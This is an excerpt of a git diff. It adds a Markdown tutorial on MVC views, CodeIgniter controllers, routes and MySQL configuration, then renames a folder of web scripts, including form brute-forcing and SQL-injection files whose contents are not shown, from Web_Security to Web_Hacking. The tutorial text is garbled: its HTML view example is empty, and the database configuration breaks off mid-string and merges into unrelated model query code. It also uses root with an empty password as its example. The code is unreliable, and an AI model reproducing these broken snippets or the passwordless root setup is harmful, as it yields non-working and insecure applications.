What the User Sees + +Responsible for the presentation layer, the actual visual display. + +Each individual page within a web app has its own view. +Views contain HTML code and PHP (if this is the backend language) to inject objects' information, passed to the view via a controller. + +A simplified version of Facebook profile view: +``` +
+``` + +## Frameworks + +The basis/foundation of your web app. + +For PHP, we can download CodeIgniter, rename to our project name, copy it to the /var/www folder, and open it in the localhost/folder. We can modify the files for our app now. + +If you get the 403 forbidden error, check the permissions and then type: +``` +restorecon -r /var/www/html +``` +(restorecon is used to reset the security context (type) (extended attributes) on one or more files). + +The user guide can be seen at +```http://localhost/APP_NAME/user_guide/``` + +### CodeIgniter Basics + +The system folder contains all of the inner-working. +The application folder is where all the code specific to our app will live, include models, controllers, and view. + +Controllers (```application/controllers/welcome.php```) +The welcome class is inherent from the CI_Controller class. + +An index refers to a main/default location. +The index action is responsible for loading the view that renders the welcome message: +public function index() { $this->load->view('welcome_message'); } +In the case of controllers, each action is frequently associated with a URL. + +The ```'welcomemessage'``` view is at ```applications/views/welcomemessage.php```. + +### Routes + +The way that our web app knows where to direct our users, based on the URLs they enter, is by establishing routes. Routes are a mapping between URLs and specific controller actions. + +We can configure routes at ```application/config/routes.php```: +``` +$route['desired-url-fragment'] = "controller-name/action-name”; +``` +Some routes work automatically: you can reference any controller action using the following URL format: +```http://localhost/APP_NAME/index.php/[controller-name]/[action-name]``` + +For example: +```http://localhost/APP_NAME/index.php/welcome/index/``` + +### Configuring our app to use the Database + +CI has built-in support for interacting with a database. +In our application, the database configuration file is store at application/config/database.php + +To connect our app to the MySQL database, update this file to: + +``` +$db['default']['hostname'] = 'localhost'; +$db['default']['username'] = 'root'; +$db['default']['password'] = ''; +$db['default']['database'] = 'db->get('todos'); $query = $this->db->order_by('order','ASC')->get('todos'); $results = array(); foreach ($query->result() as $result) { $results[] = $result; } return $results; } +``` + +In this snippet, we query our database by order, using ascending order. + + +--- +Enjoy! This article was originally posted [here](https://coderwall.com/p/5ltrxq/lamp-and-codeigniter). + diff --git a/Web_Security/urllib2/README.md b/Web_Hacking/urllib2/README.md similarity index 100% rename from Web_Security/urllib2/README.md rename to Web_Hacking/urllib2/README.md diff --git a/Web_Security/urllib2/brute_forcing_form_auth.py b/Web_Hacking/urllib2/brute_forcing_form_auth.py similarity index 100% rename from Web_Security/urllib2/brute_forcing_form_auth.py rename to Web_Hacking/urllib2/brute_forcing_form_auth.py diff --git a/Web_Security/urllib2/brute_forcing_locations.py b/Web_Hacking/urllib2/brute_forcing_locations.py similarity index 100% rename from Web_Security/urllib2/brute_forcing_locations.py rename to Web_Hacking/urllib2/brute_forcing_locations.py diff --git a/Web_Security/urllib2/mapping_web_app_install.py b/Web_Hacking/urllib2/mapping_web_app_install.py similarity index 100% rename from Web_Security/urllib2/mapping_web_app_install.py rename to Web_Hacking/urllib2/mapping_web_app_install.py diff --git a/Web_Security/urllib2/simple_http_requests.py b/Web_Hacking/urllib2/simple_http_requests.py similarity index 100% rename from Web_Security/urllib2/simple_http_requests.py rename to Web_Hacking/urllib2/simple_http_requests.py diff --git a/Web_Security/user_id/sqli_19_cookie_auth.py b/Web_Hacking/user_id/sqli_19_cookie_auth.py similarity index 100% rename from Web_Security/user_id/sqli_19_cookie_auth.py rename to Web_Hacking/user_id/sqli_19_cookie_auth.py diff --git a/Web_Security/user_id/sqli_20_user_id_2.py b/Web_Hacking/user_id/sqli_20_user_id_2.py similarity index 100% rename from Web_Security/user_id/sqli_20_user_id_2.py rename to Web_Hacking/user_id/sqli_20_user_id_2.py